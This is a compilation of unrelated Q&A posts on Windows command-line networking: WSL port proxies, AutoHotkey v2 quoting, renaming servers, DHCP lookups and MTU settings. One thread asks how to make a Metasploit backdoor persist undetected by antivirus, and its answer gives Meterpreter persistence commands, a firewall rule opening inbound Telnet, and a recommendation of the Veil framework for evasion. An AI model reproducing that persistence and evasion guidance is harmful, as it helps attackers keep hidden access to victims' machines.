I am trying to understand why a Powershell one liner I want to use to setup a port proxy to a WSL instance seemingly does not work, but running it without the grouping/substitution does work. Steps:
Get the IP address of WSL instance:
wsl hostname -I
> 172.18.108.185
Try one liner with the previous command as subexpression:
netsh interface portproxy add v4tov4 listenport=3443 `
listenaddress=0.0.0.0 connectport=3443 `
connectaddress=$(wsl hostname -I)
That seems to work because listing port proxies shows it:
netsh interface portproxy show v4tov4
> Listen on ipv4: Connect to ipv4:
>
> Address Port Address Port
> --------------- ---------- --------------- ----------
> 0.0.0.0 3443 172.18.108.185 3443
(I have also tried it without the $.)
However, the proxy forwarding does not actually work.
If I then do the same command without the substitution:
netsh interface portproxy add v4tov4 listenport=3443 `
listenaddress=0.0.0.0 connectport=3443 `
connectaddress=172.18.108.185
The output looks exactly the same:
netsh interface portproxy show v4tov4
> Listen on ipv4: Connect to ipv4:
>
> Address Port Address Port
> --------------- ---------- --------------- ----------
> 0.0.0.0 3443 172.18.108.185 3443
However, this time it works.
What is different between these two executions such that one works, one doesn't, and yet the results look exactly the same?
Abraham Zinala provided the crucial pointer:
The output from wsl hostname -I - surprisingly - has a trailing space, which must be trimmed in order for the IP address represented by the output to be used as an argument passed to netsh:
netsh interface portproxy add v4tov4 listenport=3443 `
listenaddress=0.0.0.0 connectport=3443 `
connectaddress=$((wsl hostname -I).Trim())
Related
I updated my autohotkey from v1 to v2
appskey::run,Wscript C:\folder\script.vbs "netsh wlan disconnect"
return
the above command working good in v1 to break in v2
I tried :
appskey::run "Wscript C:\folder\script.vbs" "netsh wlan disconnect"
throws error -there is no script engine for file extension ".vsnetsh"
appskey::Run "Wscript C:\folder\script.vbs netsh wlan disconnect"
it open in background but not working
Please correct the above code so that it run for multiple parameter.
In v2 everything is evaluated as an expression.
What you're doing in your run command here:
run "Wscript C:\folder\script.vbs" "netsh wlan disconnect"
is concatenating two string together, so the first (and only) argument the Run function receives is:
"Wscript C:\folder\script.vbsnetsh wlan disconnect".
So you're trying to run a file called script.vbsnetsh and pass in two arguments into it, wlan and disconnect.
And here:
Run "Wscript C:\folder\script.vbs netsh wlan disconnect"
You're running the correct script, but you're passing in three arguments, netsh, wlan and disconnect.
What you're trying to do, is run a file called script.vbs, and pass in just one argument into it, that argument being netsh wlan disconnect.
Your argument contains spaces, so you have to wrap the argument around in "s to indicate it's just one argument, just as you do in your v1 legacy script.
So the correct version would be:
Run "Wscript `"C:\folder\script.vbs`" `"netsh wlan disconnect`""
You escape quotation marks with `" in v2(docs).
And the added quotation marks around your file path aren't needed because your file path doesn't have spaces in it, but it very easily could have, so I added them in for a better demonstration.
I am using Windows Server 2012-R2 (amazon ec2) machine.
and I want to change and verify hostname in it. I checked on net and found hostname command. But when I run hostname or hostname -i command I get following error..
sethostname: Use the Network Control Panel Applet to set hostname.
hostname -s is not supported.
I further googled this problem and apparently this command is not usable on windows 2012-r2 servers. Is there any alternative or workaround command that can do the job for me??
On windows the computer name is also often referred to as hostname. However this creates some confusion. Some people use the term hostname to refer to the leftmost part of domain name which can only be set on a DNS server. However another meaning of a hostname is just an arbitrary label assigned to a machine on a computer network, and this can be directly changed on the specific machine.
There are several ways to change the computer name from the command line on windows 2012:
Method 1. Open cmd and type:
SCONFIG and you will get selection menu where #2 says Computer Name:
Method 2. From cmd type:
netdom renamecomputer %computername% /newname:<NewName> /reboot:0
Method 3. From the PowerShell console:
netdom renamecomputer $env:computername /newname:<NewName> /reboot:0
To verify the name form cmd type:
nbtstat -A xxx.xxx.xxx.xxx (where x is the ip address)
Another way to verify the name form cmd just type "hostname" without any parameters:
hostname
Is it possible to get IP from MAC Address of printer.
I have got MAC address and want to know what IP is assigned to it via DHCP server.
I tried the below query and it does give me all the IP address in scope but I need to be able to search for the one I am looking for.
netsh dhcp server \\DHCP server scope 10.65.22.0 show clients 1
I tried using Where {$_.uniqueID -like "002128903a09"} but it does not seems to like it.
Thanks
So netsh is an external application, and will return a bunch of text, but not objects, so you can't check a property (like $_.uniqueID) using a Where statement. You have two options here, you can search for the line of text that has your MAC and consume the whole line, or you can parse the text and convert it to objects. I am not familiar with the results that get spit out when you run that command, so if you want to give a sample of that (update your question to include it, don't put it in a comment), I can probably help you parse the text into objects, or just search it for a MAC address.
Or, one option would be to pipe the command into the Select-String cmdlet, and have that search for your MAC address.
$MACAddr = ("002128903a09" -split "(..)"|?{$_}) -join "-"
netsh dhcp server \\DHCP server scope 10.65.22.0 show clients 1 | Select-String -SimpleMatch $MACAddr
I believe that will at least find the line that has your MAC, and you can get the IP from there.
Edit: Updated with MAC Address formatting corrected, thanks to #JanChrbolka for helping me with the correct format!
I am trying to design a simple persistence script for Metasploit, considering the one they have is tagged by antivirus. I'm running into some trouble about what the code should look like. Here's my plan:
1. Batch file in startup folder with a loop function
2. Said batch file does a tasklist command and searches for the name of the file on the running processes
3. If it finds the process running it does nothing
4. If it does not see the process running, it simply starts it again
It is very simple design but I am running into trouble when i am writing the code. My question is: How do I write this idea into a command? The idea being how the if statement factors into the tasklist command. So I need the tasklist command to be filtered to see if the process is running based on the name, and then I need to set the output of the tasklist command as a variable so that I can write the if statement:
if %process%==Client.exe (goto yes)
Metasploit ships with default auxiliary modules. In your scenario, you can work with execute
run metsvc over meterprerter. or
run persistence -U -i <interactive seconds > -p portnumber -r victimip
you can also create rule using netsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
Using Powershell
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
If any AV is detceting your backdoor, Please use veil framework
I want to set MTU from the command line. I'm running under XP.
I've tried:
netsh interface ipv4 set subinterface "Local Area Connection" mtu=1300 store=persistent
But it's not working.
I've tried to change "ipv4" to "ip" but it didn't help. The token "subinterface" is not recognized.
Any ideas?
Thanks in advance.
You can set the MTU in Windows XP via command line in this format:
netsh interface ipv4 set subinterface "Local Area Connection" mtu=1300 store=persistent
As per http://my.bergersoft.net/2010/05/13/how-to-change-mtu-size-on-windows-xpvista72008/